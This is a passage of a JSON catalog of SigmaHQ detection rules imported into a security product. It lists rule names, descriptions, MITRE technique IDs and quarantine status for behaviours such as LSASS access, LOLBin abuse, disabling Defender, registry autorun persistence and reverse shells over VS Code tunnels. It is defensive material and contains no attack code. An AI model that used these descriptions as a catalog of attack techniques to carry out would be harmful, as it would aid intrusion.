"rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml" } }, { "id": "sigmahq-sigma-b26647de-4feb-4283-af6b-6117661283c5", "type": "detection", "name": "Powershell Suspicious Win32_PnPEntity", "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1120" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-suspicious-win32-pnpentity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b26647de-4feb-4283-af6b-6117661283c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" } }, { "id": "sigmahq-sigma-b27077d6-23e6-45d2-81a0-e2b356eea5fd", "type": "detection", "name": "Use of TTDInject.exe", "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-ttdinject-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"b27077d6-23e6-45d2-81a0-e2b356eea5fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" } }, { "id": "sigmahq-sigma-b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "type": "detection", "name": "PowerShell Get-Process LSASS", "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-process-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml" } }, { "id": "sigmahq-sigma-b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", "type": "detection", "name": "ESXi Account Creation Via ESXCLI", "description": "Detects user account creation on ESXi system via esxcli", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-account-creation-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml" } }, { "id": "sigmahq-sigma-b28e58e4-2a72-4fae-bdee-0fbe904db642", "type": "detection", "name": "Windows Defender Real-time Protection Disabled", "description": "Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a \"medium\" level if this occurs too many times in your environment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-real-time-protection-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b28e58e4-2a72-4fae-bdee-0fbe904db642", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml" } }, { "id": "sigmahq-sigma-b29a93fb-087c-4b5b-a84d-ee3309e69d08", "type": "detection", "name": "Manipulation of User Computer or Group Security Principals Across AD", "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/manipulation-of-user-computer-or-group-security-principals-across-ad.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" } }, { "id": "sigmahq-sigma-b29aed60-ebd1-442b-9cb5-16a1d0324adb", "type": "detection", "name": "Wow6432Node CurrentVersion Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wow6432node-currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" } }, { "id": "sigmahq-sigma-b2b048b0-7857-4380-b0fb-d3f0ab820b71", "type": "detection", "name": 
"Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location", "description": "Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.\nThis behavior has been observed in-the-wild by different threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/self-extracting-package-creation-via-iexpress-exe-from-potentially-suspicious-lo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2b048b0-7857-4380-b0fb-d3f0ab820b71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml" } }, { "id": "sigmahq-sigma-b2ddd389-f676-4ac4-845a-e00781a48e5f", "type": "detection", "name": "Using SettingSyncHost.exe as LOLBin", "description": "Detects using SettingSyncHost.exe to run hijacked binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/using-settingsynchost-exe-as-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "source_commit": "df5c6a6", "license": 
"DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" } }, { "id": "sigmahq-sigma-b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "type": "detection", "name": "Use of VisualUiaVerifyNative.exe", "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-visualuiaverifynative-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" } }, { "id": "sigmahq-sigma-b3503044-60ce-4bf4-bbcb-e3db98788823", "type": "detection", "name": "DLL Load via LSASS", "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-load-via-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "b3503044-60ce-4bf4-bbcb-e3db98788823", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" } }, { "id": "sigmahq-sigma-b3512211-c67e-4707-bedc-66efc7848863", "type": "detection", "name": "Potential PowerShell Downgrade Attack", "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-downgrade-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3512211-c67e-4707-bedc-66efc7848863", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" } }, { "id": "sigmahq-sigma-b366adb4-d63d-422d-8a2c-186463b5ded0", "type": "detection", "name": "Use Get-NetTCPConnection", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": 
false, "path": "detections/sigma-imports/_quarantine/use-get-nettcpconnection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b366adb4-d63d-422d-8a2c-186463b5ded0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" } }, { "id": "sigmahq-sigma-b36d01a3-ddaf-4804-be18-18a6247adfcd", "type": "detection", "name": "Add Windows Capability Via PowerShell Cmdlet", "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-windows-capability-via-powershell-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml" } }, { "id": "sigmahq-sigma-b37998de-a70b-4f33-b219-ec36bf433dc0", "type": "detection", "name": "PUA - PingCastle Execution From Potentially Suspicious Parent", "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or 
uncommon location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-pingcastle-execution-from-potentially-suspicious-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b37998de-a70b-4f33-b219-ec36bf433dc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml" } }, { "id": "sigmahq-sigma-b3ad3c0f-c949-47a1-a30e-b0491ccae876", "type": "detection", "name": "Uncommon Connection to Active Directory Web Services", "description": "Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-connection-to-active-directory-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3ad3c0f-c949-47a1-a30e-b0491ccae876", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/network_connection/net_connection_win_adws_unusual_connection.yml" } }, { "id": "sigmahq-sigma-b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "type": "detection", "name": "File Time Attribute Change - Linux", "description": "Detect file time attribute change to hide new or changes to existing files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-time-attribute-change-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_change_file_time_attr.yml" } }, { "id": "sigmahq-sigma-b3d34dc5-2efd-4ae3-845f-8ec14921f449", "type": "detection", "name": "Browser Started with Remote Debugging", "description": "Detects browsers starting with the remote debugging flags. 
This is a technique often used to perform browser injection attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/browser-started-with-remote-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" } }, { "id": "sigmahq-sigma-b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "type": "detection", "name": "MSSQL SPProcoption Set", "description": "Detects when a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-spprocoption-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml" } }, { "id": "sigmahq-sigma-b3e6418f-7c7a-4fad-993a-93b65027a9f1", "type": "detection", "name": "DNS Query To Visual Studio Code Tunnels Domain", "description": "Detects DNS query requests to Visual Studio Code tunnel domains. 
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-visual-studio-code-tunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3e6418f-7c7a-4fad-993a-93b65027a9f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml" } }, { "id": "sigmahq-sigma-b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "type": "detection", "name": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumer (WMI event subscription persistence) activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-activescripteventconsumers-activity-via-scrcons-exe-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" } }, { "id": "sigmahq-sigma-b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e", "type": "detection", "name": "Suspicious Binaries and Scripts in Public Folder", "description": "Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-binaries-and-scripts-in-public-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml" } }, { "id": "sigmahq-sigma-b45ab1d2-712f-4f01-a751-df3826969807", "type": "detection", "name": "AWS STS GetSessionToken Misuse", "description": "Identifies the suspicious use of GetSessionToken. 
Tokens could be created and used by attackers to move laterally and escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1550", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-sts-getsessiontoken-misuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b45ab1d2-712f-4f01-a751-df3826969807", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml" } }, { "id": "sigmahq-sigma-b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "type": "detection", "name": "Local System Accounts Discovery - Linux", "description": "Detects enumeration of local system accounts. 
This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-system-accounts-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_local_account.yml" } }, { "id": "sigmahq-sigma-b471f462-eb0d-4832-be35-28d94bdb4780", "type": "detection", "name": "Remote Access Tool - Renamed MeshAgent Execution - Windows", "description": "Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\nRMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\nHowever, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-renamed-meshagent-execution-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b471f462-eb0d-4832-be35-28d94bdb4780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_renamed_meshagent_execution.yml" } }, { "id": "sigmahq-sigma-b48492dc-c5ef-4572-8dff-32bc241c15c8", "type": "detection", "name": "Load Of RstrtMgr.DLL By A Suspicious Process", "description": "Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shutting down specific processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/load-of-rstrtmgr-dll-by-a-suspicious-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b48492dc-c5ef-4572-8dff-32bc241c15c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml" } }, { "id": "sigmahq-sigma-b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "type": "detection", "name": "Suspicious Double Extension Files", "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the 
fact that Windows hides known file extensions by default.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-double-extension-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_double_extension.yml" } }, { "id": "sigmahq-sigma-b494b165-6634-483d-8c47-2026a6c52372", "type": "detection", "name": "Telegram API Access", "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1102.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/telegram-api-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b494b165-6634-483d-8c47-2026a6c52372", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_telegram_api.yml" } }, { "id": "sigmahq-sigma-b4a6d707-9430-4f5f-af68-0337f52d5c42", "type": "detection", "name": "Sign-in Failure Due to Conditional Access 
Requirements Not Met", "description": "Detects Azure sign-in failures caused by unmet Conditional Access requirements. Define a baseline threshold for such failures; a volume above the baseline may indicate brute-force attempts or misuse of valid cloud accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-in-failure-due-to-conditional-access-requirements-not-met.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4a6d707-9430-4f5f-af68-0337f52d5c42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml" } }, { "id": "sigmahq-sigma-b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "type": "detection", "name": "Restricted Software Access By SRP", "description": "Detects application executions blocked by a Software Restriction Policies (SRP) policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restricted-software-access-by-srp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
